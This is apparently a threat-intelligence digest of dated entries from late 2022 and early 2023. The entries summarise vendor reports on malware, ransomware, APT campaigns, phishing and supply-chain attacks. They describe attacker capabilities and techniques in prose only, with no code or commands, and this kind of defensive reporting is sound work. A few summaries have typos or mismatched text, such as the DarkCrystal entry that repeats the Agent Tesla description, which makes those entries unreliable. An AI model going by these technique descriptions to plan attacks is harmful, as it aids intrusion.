- The_modified_CIA_attack_kit_Hive_enters_the_field_of_black_and_gray_production
- Date of Scan:
- 2023-01-10
- Impact:
- LOW
- Summary:
- 360Netlab researchers have observed that xdr33 is a backdoor and born out of the CIA Hive project. The main purpose is to collect sensitive information and provide a foothold for subsequent intrusions.
Source:
https://blog.netlab.360.com/warning-hive-variant-xdr33-is-coming_cn/
—
- Intel Source:
- Symantec
- Intel Name:
- Bluebottle_Campaign_Hits_Banks_With_Signed_Malware
- Date of Scan:
- 2023-01-10
- Impact:
- LOW
- Summary:
- Researchers from Symantec have identified Bluebottle campaign hits banks in French speaking countries in Africa with the activity that leverages new TTPs.
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Agent_Tesla_Malware
- Date of Scan:
- 2023-01-10
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of Agent Tesla Malware. Agent Tesla is a very popular spyware Trojan built for the.NET framework. Agent Tesla grabs data from the victim’s clipboard, logs keystrokes, captures screenshots, and gains access to the victim’s webcam. It has the ability to terminate running analytic programs and anti-virus applications.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-agent-tesla-malware-active-iocs-81
—
- Intel Source:
- DFIR Report
- Intel Name:
- The_Details_Exianition_of_Ursnif_Malware
- Date of Scan:
- 2023-01-10
- Impact:
- LOW
- Summary:
- Researchers from DFIR have analyzed the Ursnif malware. It delivers malicious ISO to users.
Source:
https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/
—
- Intel Source:
- Resecurity
- Intel Name:
- Drug_trafficking_and_illegal_pharmacies_compete_on_the_dark_web
- Date of Scan:
- 2023-01-10
- Impact:
- MEDIUM
- Summary:
- Researchers from Resecurity have identified that the top 10 marketplaces are currently representing the core ecosystem of drug trafficking in the Dark Web, which is split between actors from multiple regions and influence groups.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Brazil_Malspam_Pushing_Astaroth
- Date of Scan:
- 2023-01-09
- Impact:
- LOW
- Summary:
- Researchers from SANS have identified four Portuguese language emails targeting Brazil. These messages are pushing the same type of Astaroth (Guildma) malware.
—
- Intel Source:
- Aqua Blog
- Intel Name:
- Diving_Deep_into_PyTorch_Dependency_Confusion_Administered_Malware
- Date of Scan:
- 2023-01-09
- Impact:
- LOW
- Summary:
- Aquasec researchers have identified the dependency of the widely used PyTorch-nightly Python package targeting in a dependency confusion attack, resulting in thousands of individuals downloading a malicious binary that exfiltrated data through DNS.
Source:
https://blog.aquasec.com/pytorch-dependency-confusion-administered-malware
—
- Intel Source:
- Cyble
- Intel Name:
- Hackers_Targeting_Zoom_Appliation
- Date of Scan:
- 2023-01-09
- Impact:
- MEDIUM
- Summary:
- Cyble researchers have identified a phishing campaign targeting Zoom application software to deliver the IcedID malware. This malware primarily targeting businesses and can be used to steal payment information.
Source:
https://blog.cyble.com/2023/01/05/zoom-users-at-risk-in-latest-malware-campaign/
—
- Intel Source:
- Checkpoint
- Intel Name:
- Blindeagle_Targeting_Ecuador_Based_Organizations
- Date of Scan:
- 2023-01-06
- Impact:
- LOW
- Summary:
- Researchers from Checkpoint have identified a campaign that is targeting Ecuador based organizations, CPR detected a new infection chain that involves a more advanced toolset.
Source:
https://research.checkpoint.com/2023/blindeagle-targeting-ecuador-with-sharpened-tools/
—
- Intel Source:
- Rewterz
- Intel Name:
- PatchWork_APT_Group_Targeting_Pakistan
- Date of Scan:
- 2023-01-06
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of PatchWork APT Group. This Indian threat actor Patchwork has been active since December 2015 and recently using spear phishing to strike Pakistan. PatchWork, (also known as Mahabusa, White Elephant, hangOver, VICEROY TIGER, The Dropping Elephant) is an APT that mainly conducts cyber-espionage activities against its targets.
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Amadey_Botnet
- Date of Scan:
- 2023-01-06
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of Amadey Botnet. Amadey infects a victim’s computer and incorporates it into a. botnet. The Amadey trojan can also download additional malware. and exfiltrate user information to a command and control (C2) server.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-amadey-botnet-active-iocs-21
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_SmokeLoader_Malware
- Date of Scan:
- 2023-01-05
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of SmokeLoader Malware. This malware is mostly used to load additional malicious software, which is often obtained from a third-party source. Smoke Loader can load its modules allowing it to do several activities without the use of additional components
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-smokeloader-malware-active-iocs-55
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_DarkCrystal_Agent_Tesla_Malware
- Date of Scan:
- 2023-01-05
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of Agent Tesla Malware. Agent Tesla is a very popular spyware Trojan built for the.NET framework. Agent Tesla grabs data from the victim’s clipboard, logs keystrokes, captures screenshots, and gains access to the victim’s webcam. It has the ability to terminate running analytic programs and anti-virus applications.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-agent-tesla-malware-active-iocs-81
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_CrySIS_aka_Dharma_Ransomware
- Date of Scan:
- 2023-01-05
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of CrySIS aka Dharma Ransomware. CrySIS, also known as Dharma, is a group of ransomware that has been active since 2016. Researchers indicate the spam emails attempt to disguise themselves as invoice emails. In reality, the spam is being used to infect users with the Ursnif keylogger or the Dharma ransomware.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-crysis-aka-dharma-ransomware-active-iocs-2
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Ursnif_Banking_Trojan
- Date of Scan:
- 2023-01-05
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Ursnif Banking Trojan. The attackers have switched to using Trojans such as Ursnif to steal other types of data, including email configurations, as well as credentials and passwords stored in the web browsers and even digital wallets. Threat actors use different techniques to make a victim fall into their trap like a phishing email.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-ursnif-banking-trojan-active-iocs-43
—
- Intel Source:
- ASEC
- Intel Name:
- Installing_CoinMiner_by_malware
- Date of Scan:
- 2023-01-05
- Impact:
- LOW
- Summary:
- The ASEC analysis team observed a new Linux malware developed with Shell Script Compiler that has been installing a CoinMiner. It believes that after successful verification through a dictionary attack on inadequately managed Linux SSH servers, different malwares were installed on the target system. Among those installed were the Shc downloader, XMRig CoinMiner installed through the former, and DDoS IRC Bot, developed with Perl.
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_DarkCrystal_RAT_(DCRat)
- Date of Scan:
- 2023-01-05
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of DarkCrystal RAT. DCRat is a Russian backdoor, was initially introduced in 2018. The malware’s modular architecture allows it to be extended for a variety of nefarious objectives, including surveillance, reconnaissance, data theft, DDoS attacks, and arbitrary code execution.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-darkcrystal-rat-dcrat-active-iocs-21
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_LockBit_Ransomware
- Date of Scan:
- 2023-01-04
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of LockBit Ransomware. LockBit attacks leave few traces for forensic analysis as the malware loads into the system memory, with logs and supporting files removed upon execution.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-lockbit-ransomware-active-iocs-11
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Qakbot_(Qbot)_Malware
- Date of Scan:
- 2023-01-04
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of Qakbot (Qbot) Malware. This banking Trojan, QakBot steals financial data from infected systems, and a loader using C2 servers for payload targeting and download.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-qakbot-qbot-malware-active-iocs-52
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_DarkyLock_Ransomware
- Date of Scan:
- 2023-01-04
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of DarkyLock Ransomware. The ransomware attacks all commonly used file formats, including media, documents, databases, and archive files.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-darkylock-ransomware-active-iocs
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_RedLine_Stealer_Ransomware
- Date of Scan:
- 2023-01-04
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of RedLine Stealer. This malware first appeared in March 2020. Redline expanded throughout several nations during the COVID-19 epidemic and is still active today.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-redline-stealer-active-iocs-69
—
- Intel Source:
- Security Joes
- Intel Name:
- The_Insurance_&_Financial_Institutes_In_Europe_are_targeted_by_Raspberry_Robin
- Date of Scan:
- 2023-01-04
- Impact:
- LOW
- Summary:
- Threat researchers from SecurIty Joes company observed and responded to hackers attacks twice this month that was using a framework called Raspberry Robin.
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Cobalt_Strike_Malware
- Date of Scan:
- 2023-01-04
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Cobalt Strike Malware. Cobalt Strike lets the attacker install a ‘Beacon’ agent on the target PC which provides the attacker with a plethora of capabilities, including command execution, file transfer, keylogging, mimikatz, port scanning, and privilege escalation.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-cobalt-strike-malware-active-iocs-40
—
- Intel Source:
- DrWeb
- Intel Name:
- The_infection_of_WordPress_based_websites
- Date of Scan:
- 2023-01-04
- Impact:
- LOW
- Summary:
- Researchers from Doctor Web found a malicious Linux program that is capable of hacking websites based on a WordPress CMS. It can exploits 30 vulnerabilities in a number of plugins and themes for this platform. It can inject with malicious JavaScripts these websites if they have outdated versions of such add-ons, lacking crucial fixes.
—
- Intel Source:
- Recorded Future
- Intel Name:
- The_European_Government_Organizations_targeted_by_RedDelta_threat_group
- Date of Scan:
- 2022-12-30
- Impact:
- MEDIUM
- Summary:
- Reserachers from Recorded Future are tracking activity of this RedDelta team which they think is attributed to the likely Chinese state-sponsored threat activity group which is targeting organizations within Europe and Southeast Asia using a customized variant of the PlugX backdoor.
—
- Intel Source:
- Guardio
- Intel Name:
- Hackers_Abusing_Google_AdWords
- Date of Scan:
- 2022-12-30
- Impact:
- LOW
- Summary:
- Researchers from Gradio have identified a new technique to abuse Google’s ad-words powerful advertisement platform is spreading rogue promoted search results in mass.
—
- Intel Source:
- SlowMist
- Intel Name:
- Lazarus_Threat_Group_Using_Phishing_Domains_to_Target_NFT_Investors
- Date of Scan:
- 2022-12-30
- Impact:
- MEDIUM
- Summary:
- Researchers from SlowMist have identified a massive phishing campaign targeting NFT investors. It observed that the attackers set up nearly 500 decoy sites with malicious Mints.
—
- Intel Source:
- PaloAlto
- Intel Name:
- The_WildFire_malware_team_monitoring_malware_techniques
- Date of Scan:
- 2022-12-30
- Impact:
- LOW
- Summary:
- Palo Alto researchers did deep analyses on malware authors and malware variations if they detect they were running in a sandbox. They shared and discussed a lot of sandboxing approaches out there with pros and cons to each and many of the evasion types.
Source:
https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/
—
- Intel Source:
- Zscaler
- Intel Name:
- ArkeiStealer_masquerade_as_a_trading_application
- Date of Scan:
- 2022-12-28
- Impact:
- LOW
- Summary:
- Researchers from ThreatLabz discovered that threat actors are now distributing ArkeiStealer through Windows Installer binaries which masquerade as a trading application. The trading application is backdoored with the SmokeLoader downloader which further downloads an information stealer.
Source:
https://www.zscaler.com/blog/security-research/trade-with-caution
—
- Intel Source:
- Securelist
- Intel Name:
- BlueNoroff_bypassing_MoTW
- Date of Scan:
- 2022-12-28
- Impact:
- LOW
- Summary:
- Researchers from securelist discovered new method the group adopted is aimed at evading the Mark-of-the-Web (MOTW) flag, the security measure whereby Windows displays a warning message when the user tries to open a file downloaded from the internet.
Source:
https://securelist.com/bluenoroff-methods-bypass-motw/108383/
—
- Intel Source:
- Cyble
- Intel Name:
- PureLogs_Stealer_Through_Spam_Campaigns
- Date of Scan:
- 2022-12-28
- Impact:
- MEDIUM
- Summary:
- Cyble Research and Intelligence Labs (CRIL) came across a tweet about PureLogs information stealer by TG Soft. This tool is used by the Threat Actor (TA) “Alibaba2044” to launch a malicious spam campaign at targets based in Italy
Source:
https://blog.cyble.com/2022/12/27/pure-coder-offers-multiple-malware-for-sale-in-darkweb-forums/
—
- Intel Source:
- Palo Alto Networks
- Intel Name:
- Sandbox_Evasions_Navigating_the_Vast_Ocean
- Date of Scan:
- 2022-12-28
- Impact:
- LOW
- Summary:
- Palo Alto Networks customers receive improved detection for the evasions through Advanced WildFire.
Source:
https://unit42.paloaltonetworks.com/sandbox-evasion-memory-detection/#post-126138-_feak18cweg6f
—
- Intel Source:
- Wordfence
- Intel Name:
- Vulnerability_in_YITH_WooCommerce_Gift_Cards
- Date of Scan:
- 2022-12-28
- Impact:
- LOW
- Summary:
- The Wordfence Threat Intelligence team has been tracking exploits targeting a Critical Severity Arbitrary File Upload vulnerability in YITH WooCommerce Gift Cards Premium, a plugin with over 50,000 installations according to the vendor.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Google_Ads_Traffic_Led_to_Multiple_Malware
- Date of Scan:
- 2022-12-27
- Impact:
- MEDIUM
- Summary:
- Researchers from SANS have identified google ad traffic that led to a fake TeamViewer page, and that page led to a different type of malware.
Source:
https://isc.sans.edu/diary/Google+ad+traffic+leads+to+stealer+packages+based+on+free+software/29376/
—
- Intel Source:
- Team Cymru
- Intel Name:
- The_Details_of_IcedID_BackConnect_Protocol
- Date of Scan:
- 2022-12-27
- Impact:
- LOW
- Summary:
- Team-Cymru researchers have continued monitoring the IcedID / BokBot activity and identified some insights derived from infrastructure associated with IcedID’s BackConnect (BC) protocol.
Source:
https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- The_Details_About_Shadow_IT
- Date of Scan:
- 2022-12-27
- Impact:
- MEDIUM
- Summary:
- IBM Security Intelligence researchers have highlighted three incidents where Shadow IT was leveraged during the attack to help organizations realize how Shadow IT can quickly transform from a threat to an incident.
Source:
https://securityintelligence.com/posts/beware-lurking-shadows-it/
—
- Intel Source:
- ASEC
- Intel Name:
- Qakbot_Distributing_via_Virtual_Disk_Files
- Date of Scan:
- 2022-12-23
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified that Qakbot malware has been distributed in ISO and IMG file formats and discovered that it has recently changed its distribution to the use of VHD files.
—
- Intel Source:
- SentinelOne
- Intel Name:
- Vice_Society_Ransomware_Attackers_Adopt_Robust_Encryption_Methods
- Date of Scan:
- 2022-12-23
- Impact:
- MEDIUM
- Summary:
- Researchers from SentinelLabs have identified Vice Society group is adopting a new custom-branded ransomware payload in recent intrusions and it is dubbed “PolyVice”, implements a robust encryption scheme, using NTRUEncrypt and ChaCha20-Poly1305 algorithms.
—
- Intel Source:
- CADO Security
- Intel Name:
- New_Variant_of_Kiss_a_Dog_Cryptojacking_Campaign
- Date of Scan:
- 2022-12-23
- Impact:
- LOW
- Summary:
- Researchers from CADO security have uncovered a newer variant of Kiss-a-Dog campaign and observed leveraging at there Redis honeypot suggesting a broadening of scope from Docker and Kubernetes.
Source:
https://www.cadosecurity.com/kiss-a-dog-discovered-utilizing-a-20-year-old-process-hider/
—
- Intel Source:
- Rapid7
- Intel Name:
- The_exploitation_of_OWASSRF_in_MS_Exchange_Server_for_RCE
- Date of Scan:
- 2022-12-23
- Impact:
- LOW
- Summary:
- Rapid7 researchers have observed the exploitation of OWASSRF in Microsoft exchange servers for remote code execution.
—
- Intel Source:
- Fortinet
- Intel Name:
- Hackers_Using_Phishing_Emails_to_Target_Tax_Forms
- Date of Scan:
- 2022-12-23
- Impact:
- LOW
- Summary:
- Researchers from Fortinet have discovered the malicious emails and that it had been sent by the recently resurgent Emotet group. It is claiming to be from “IRS.gov,” this phishing e-mail originated from an organization’s compromised e-mail account in Pakistan. The subject and body claim that the recipient’s IRS K-1 forms are attached in a Zip archive encrypted with the password “0440”.
Source:
https://www.fortinet.com/blog/threat-research/the-taxman-never-sleeps
—
- Intel Source:
- ASEC
- Intel Name:
- Nitol_DDoS_Malware_Installing_Amadey_Bot
- Date of Scan:
- 2022-12-23
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered that a threat actor has been using Nitol DDoS Bot to install Amadey. It is a downloader that has been in circulation since 2018, and besides extorting user credentials, it can also be used for the purpose of installing additional malware.
—
- Intel Source:
- Spider Labs
- Intel Name:
- Diving_Deep_into_Ekipa_RAT
- Date of Scan:
- 2022-12-23
- Impact:
- LOW
- Summary:
- SpiderLabs researchers have analyzed samples of an Ekipa Remote Access Trojan (RAT) in the wild and found interesting techniques for the use of malicious Office documents. The Ekipa RAT was added to a sophisticated threat actors’ cyber arsenal and used in the Russian – Ukraine war.
—
- Intel Source:
- TrendMicro
- Intel Name:
- IcedID_Botnet_Leveraging_Google_PPC_to_Distribute_Malware
- Date of Scan:
- 2022-12-23
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have analyzed the latest changes in IcedID botnet from a campaign that abuses Google pay-per-click (PPC) ads to distribute IcedID via malvertising attacks.
—
- Intel Source:
- Rewterz
- Intel Name:
- Ursnif_Banking_Trojan_Active_IOCs
- Date of Scan:
- 2022-12-23
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Ursnif Banking Trojan. It is also known as Gozi and Dreambot has been around for more than 10 years. It gained popularity in 2015 when its source code was published on Github and since then the moderators have always tweaked some changes to make use of their arsenal according to their gains. Mainly attacking banks and other financial institutions.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-ursnif-banking-trojan-active-iocs-42
—
- Intel Source:
- Securelist
- Intel Name:
- The_Examine_of_Albanian_Government_E_service_Attack
- Date of Scan:
- 2022-12-23
- Impact:
- LOW
- Summary:
- Researchers from Securelist have compared the first and second waves of ransomware and wiper malware used to target Albanian entities and detail connections with previously known ROADSWEEP ransomware and ZEROCLEARE variants.
Source:
https://securelist.com/ransomware-and-wiper-signed-with-stolen-certificates/108350/
—
- Intel Source:
- Rewterz
- Intel Name:
- North_Korean_APT_Kimsuky_Aka_Black_Banshee_Active_IOCs
- Date of Scan:
- 2022-12-22
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of North Korean APT Kimsuky Aka Black Banshee. It is a North Korean nation-state actor that has been active since 2012. It primarily targets South Korean government agencies and conducts espionage activities against targets in the United States and Japan.
—
- Intel Source:
- Rewterz
- Intel Name:
- Qakbot_aka_Qbot_Malware_Active_IOCs
- Date of Scan:
- 2022-12-22
- Impact:
- MEDIUM
- Summary:
- The Rewterz analysts team have observed last couple months that attackers are employing a number of strategies to avoid detection, using Excel (XLM) 4.0 and ZIP file extensions. hreat actors are disguising attachments intended to spread malware using a variety of different common file names with typical keywords for finance and business operations
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-qakbot-qbot-malware-active-iocs-51
—
- Intel Source:
- Rewterz
- Intel Name:
- AsyncRAT_Active_IOCs
- Date of Scan:
- 2022-12-22
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of AsyncRAT. It is an open-source tool designed for remote monitoring via encrypted connections. However, it could be utilized by threat actors as it provides keylogging, remote access, and other functionality that could damage a victim’s computer or system.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-asyncrat-active-iocs-4
—
- Intel Source:
- Rewterz
- Intel Name:
- Shuckworm_APT_Group_aka_Armageddon_Active_IOCs
- Date of Scan:
- 2022-12-22
- Impact:
- MEDIUM
- Summary:
- Researchers from Rewterz have identified the active IOCs of Shuckworm APT Group. It is a Russia-backed advanced persistent threat (APT) that has been operating since at least 2013. The main goal of this APT is to use the malicious document to gain control of the target machine.
—
- Intel Source:
- Rewterz
- Intel Name:
- Wanna_Cryptor_aka_WannaCry_Ransomware_Active_IOCs
- Date of Scan:
- 2022-12-22
- Impact:
- HIGH
- Summary:
- The Rewterz analysts team did analysis summary on Wanna Cryptor aka WannaCry Ransomware and have identified the active IOCs of it. WannaCry is also called WCry or WanaCrptor ransomware malware was discovered in May 2017, it infected networks running Microsoft Windows as part of a massive cyberattack. This ransomware can encrypt all your data files and demands payment to restore the stolen information, usually in bitcoin with a ransom amount. WannaCry is one of the most dangerous malware ever used for cyberattacks.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Meddler_in_the_Middle_Phishing_Attacks
- Date of Scan:
- 2022-12-22
- Impact:
- LOW
- Summary:
- Palo Alto Unit 42 researches expained the phishing techniques for Meddler in the Middle (MitM) phishing attacks. Meddler in the Middle (MitM) phishing attacks show how threat actors find ways to get around traditional defenses and advice. MitM phishing attacks are a state-of-the-art type of phishing attack capable of breaking two-factor authentication (2FA) while avoiding many content-based phishing detection engines. Rather than showing a spoofed version of a target login page, a MitM attack uses a reverse-proxy server to relay the original login page directly to the user’s browser.
Source:
https://unit42.paloaltonetworks.com/meddler-phishing-attacks/
—
- Intel Source:
- Rewterz
- Intel Name:
- APT_SideWinder_Group_Active_IOCs
- Date of Scan:
- 2022-12-22
- Impact:
- MEDIUM
- Summary:
- The Rewterz analysts team have identified the active IOCs of APT SideWinder Group which is a suspected Indian threat actor group that has been active since 2012. It has been detected targeting Pakistani government officials with a decoy file related to COVID-19 in its most recent effort.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Windows_AMSI_Bypass_Techniques
- Date of Scan:
- 2022-12-22
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers have analyzed the implementations that cybercriminals use to bypass the Windows Antimalware Scan Interface (AMSI).
Source:
https://www.trendmicro.com/en_us/research/22/l/detecting-windows-amsi-bypass-techniques.html
—
- Intel Source:
- Fortinet
- Intel Name:
- New_Supply_Chain_Attack_Using_Python_Package_Index
- Date of Scan:
- 2022-12-22
- Impact:
- MEDIUM
- Summary:
- Researchers from Fortinet have discovered a 0-day attack embedded in a PyPI package (Python Package Index) and it is called “aioconsol.”
—
- Intel Source:
- Sucuri
- Intel Name:
- FakejQuery_Domain_Redirects_Site_Visitors_to_Scam_Pages
- Date of Scan:
- 2022-12-22
- Impact:
- LOW
- Summary:
- Sucuri researchers have identified an infection that makes its round across vulnerable WordPress sites, detected on over 160 websites. The infection is injected at the top of legitimate JavaScript files and executes a script from the malicious domain.
Source:
https://blog.sucuri.net/2022/12/fake-jquery-domain-redirects-site-visitors-scam.html
—
- Intel Source:
- Microsoft
- Intel Name:
- New_Zerobot_1_1_adds_new_exploits
- Date of Scan:
- 2022-12-22
- Impact:
- HIGH
- Summary:
- The new version of the malware, Zerobot 1.1, adds new exploits and distributed denial-of-service attack capabilities, expanding the malware’s reach to different types of Internet of Things (IoT) devices, according to a report released by Microsoft on Wednesday. Zerobot was first discovered by researchers in November. The malware spreads primarily through unpatched and improperly secured IoT devices, such as firewalls, routers, and cameras, according to Microsoft. Hackers constantly modify the botnet to scale and target as many of the devices as possible.
—
- Intel Source:
- Zscaler
- Intel Name:
- Diving_Deep_into_Nokoyawa_Ransomware
- Date of Scan:
- 2022-12-22
- Impact:
- LOW
- Summary:
- Researchers from Zscaler have analyzed the Nokoyawa ransomware 2.0 including its new configuration, encryption algorithms, and data leak site.
Source:
https://www.zscaler.com/blogs/security-research/nokoyawa-ransomware-rust-or-bust
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_Examine_of_Royal_Ransomware_and_Tools_Using_by_Threat_Actors
- Date of Scan:
- 2022-12-22
- Impact:
- LOW
- Summary:
- Researchers from Trendmicro have detected multiple attacks from the Royal ransomware group and they have investigated the tools that Royal ransomware actors used to carry out their attacks.
—
- Intel Source:
- Cyble
- Intel Name:
- Spotted_multiple_ransomware_strains
- Date of Scan:
- 2022-12-22
- Impact:
- MEDIUM
- Summary:
- Cyble Research and Intelligence Labs (CRIL) have spotted multiple ransomware strains created based on the source of other ransomware families. Recently, CRIL observed new ransomware families, such as Putin Team, ScareCrow, BlueSky Meow, etc., created from the leaked source code of Conti Ransomware.
Source:
https://blog.cyble.com/2022/12/22/new-ransomware-strains-emerging-from-leaked-contis-source-code/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Hackers_Using_Microsoft_Excel_Malicious_Addins
- Date of Scan:
- 2022-12-22
- Impact:
- LOW
- Summary:
- Researchers from Cisco Talos have investigated another vector for the introduction of malicious code to Microsoft Excel malicious add-ins, specifically XLL files.
Source:
https://blog.talosintelligence.com/xlling-in-excel-malicious-add-ins/
—
- Intel Source:
- Rewterz
- Intel Name:
- Hive_Ransomware_Active_IOCs
- Date of Scan:
- 2022-12-22
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Hive Ransomware. It is one of the quickest evolving ransomware families which was first observed in June 2021 and likely operates as affiliate-based ransomware, employs a wide variety of tactics, techniques, and procedures (TTPs), creating significant challenges for defense and mitigation.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-hive-ransomware-active-iocs-28
—
- Intel Source:
- PaloAlto
- Intel Name:
- Russian_Hackers_Targeting_Petroleum_Refinery_in_NATO
- Date of Scan:
- 2022-12-21
- Impact:
- MEDIUM
- Summary:
- PaloAlto researchers have discovered the Russia-linked Gamaredon group attempting to unsuccessfully break into a large petroleum refining company within a NATO member state earlier this year amid the ongoing Russo-Ukrainian war. Also, seen more than 500 new domains and 200 malware samples attributed to Gamaredon APT since the beginning of the invasion.
—
- Intel Source:
- Rewterz
- Intel Name:
- LockBit_3_0_Ransomware_active_IOCs
- Date of Scan:
- 2022-12-20
- Impact:
- HIGH
- Summary:
- The Rewterz analysts team did analyses summary on LockBit 3.0 ransomware that has recently been distributed without restriction to version or identical filename. Users must examine the file extensions of document files, update apps and V3 to the newest version, and be very cautious when opening files from unidentified sources.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-lockbit-3-0-ransomware-active-iocs-4
—
- Intel Source:
- Rewterz
- Intel Name:
- SystemBC_Malware_active_IOCs
- Date of Scan:
- 2022-12-20
- Impact:
- MEDIUM
- Summary:
- The Rewterz analysts team did analyses summary on SystemBC malware is recently being distributed through Emotet and SmokeLoader. The malware has been used in multiple ransomware attacks over the past few years. SystemBC acts as a Proxy Bot and if an infected system has SystemBC on it, then the system can be used as a passage to access the victim’s address.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-systembc-malware-active-iocs-8
—
- Intel Source:
- Rewterz
- Intel Name:
- GandCrab_Ransomware_active_IOCs
- Date of Scan:
- 2022-12-20
- Impact:
- HIGH
- Summary:
- The Rewterz analysts team did analyses summary on GandCrab which is a ransomware-as-a-service variant – was discovered in early 2018. As of today it had five versions of GandCrab have been created since its discovery. GandCrab ransomware encrypts victim’s files and demands ransom money in exchange for decryption keys. GandCrab targets organisations and individuals that use Microsoft Windows-powered PCs. This ransomware has attacked a huge number of systems in India, Chile, Peru, the United States, and the Philippines.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-gandcrab-ransomware-active-iocs-12
—
- Intel Source:
- Rewterz
- Intel Name:
- STOP_DJVU_Ransomware_active_IOCs
- Date of Scan:
- 2022-12-20
- Impact:
- HIGH
- Summary:
- The Rewterz analysts team did analysis summary on STOP (DJVU) Ransomware. The STOP/DJVU ransomware is a Trojan that encrypts files. It infiltrates your computer invisibly and encrypts all of your data, making them unavailable to you. It leaves a ransom letter warning which demands money in exchange for decrypting your data and making them available to you again. Malware is delivered via cracked applications, fake set-up apps keygens, activators, and Windows updates.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-stop-djvu-ransomware-active-iocs-50
—
- Intel Source:
- Rewterz
- Intel Name:
- BumbleBee_Malware_active_IOCs
- Date of Scan:
- 2022-12-20
- Impact:
- MEDIUM
- Summary:
- The rewterz analysts team did analyses summery on BumbleBee Malware. This malware loader is used to download Cobalt Strike and other malware such as ransomware. It can replaces the BazarLoader backdoor, which is previously used to transmit ransomware payloads. This new malware is linked to a number of threat actors, including several well-known ransomware.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-bumblebee-malware-active-iocs-14
—
- Intel Source:
- TrendMicro
- Intel Name:
- Telecom_and_Governments_are_targeted_by_Raspberry_Robin_Malware
- Date of Scan:
- 2022-12-20
- Impact:
- MEDIUM
- Summary:
- TrendMicro reserachers discovered some new samples of the Raspberry Robin malware spreading in telecommunications and government office systems. The main payload itself is packed with more than 10 layers for obfuscation and is capable of delivering a fake payload once it detects sandboxing and security analytics tools.
—
- Intel Source:
- Rewterz
- Intel Name:
- Snake_Keylogger_s_Malware_active_IOCs
- Date of Scan:
- 2022-12-20
- Impact:
- MEDIUM
- Summary:
- The Rewterz analysts team did analysis summary on Snake Keylogger’s Malware. Snake malware’s main feature is keylogging, but it also has additional capabilities such as taking screenshots and extracting data from the clipboard. Snake can also extract and exfiltrate data from browsers and email clients.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-snake-keyloggers-malware-active-iocs-39
—
- Intel Source:
- Reversing Labs
- Intel Name:
- Posing_of_SentinelOne_SDK_as_Malicious_PyPI_package
- Date of Scan:
- 2022-12-20
- Impact:
- LOW
- Summary:
- Researchers from Reversing Labs have identified a new malicious package, named ‘SentinelOne,’ on the Python Package Index (PyPI) repository that impersonates a legitimate software development kit (SDK) for SentinelOne.
Source:
https://blog.reversinglabs.com/blog/sentinelsneak-malicious-pypi-module-poses-as-security-sdk
—
